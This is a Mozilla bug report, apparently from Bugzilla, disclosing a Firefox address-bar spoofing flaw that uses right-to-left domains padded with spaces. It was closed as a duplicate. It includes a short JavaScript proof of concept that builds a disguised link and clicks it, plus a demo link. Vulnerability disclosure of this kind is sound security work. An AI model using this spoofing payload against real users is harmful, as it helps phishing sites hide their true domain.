Closed Bug 1317654 Opened 8 years ago Closed 8 years ago

Firefox RTL+Space URL Spoofing

Categories

(Core :: Layout: Text and Fonts, defect)

Product:
Core
Component:
Layout: Text and Fonts
Version:
53 Branch
Platform:
All
Unspecified
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1298584

People

(Reporter: xisigr, Unassigned)

Details

Attachments

(1 file)

firefox_url_rtl.png
1.64 MB, image/png
Details
Attached image firefox_url_rtl.png
VULNERABILITY DETAILS RTL URLs make IP address to the left side of the Firefox Omnibox.Unicode Character 'SPACE' (U+0020),which will display blank in the Chrome Omnibox. A lot of space will hide the real domain. VERSION Firefox Version: [49.0.2] + [stable] FireNightly Version: [53.0a1] Operating System: [Windows7&10,MAC10.12.1] REPRODUCTION CASE POC: <script> function aa(){ var link = document.createElement('a'); link.href = "http://xn--ggbla1c4e.xn--ngbc5azd/?"+Array(0x100).join("%20")+"127.0.0.1"; link.target="aaaa"; document.body.appendChild(link); link.click(); } </script> <a onclick="aa();" href="javascript:void(0);">CLICK ME</a> Online Demo:http://xisigr.com/test/spoof/firefox/rtl.html
There is a wrong word in ‘VULNERABILITY DETAILS:display blank in the Chrome Omnibox’,Chrome changed to Firefox.:)
Group: firefox-core-security → layout-core-security
Component: Security → Layout: Text
Product: Firefox → Core
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Group: layout-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: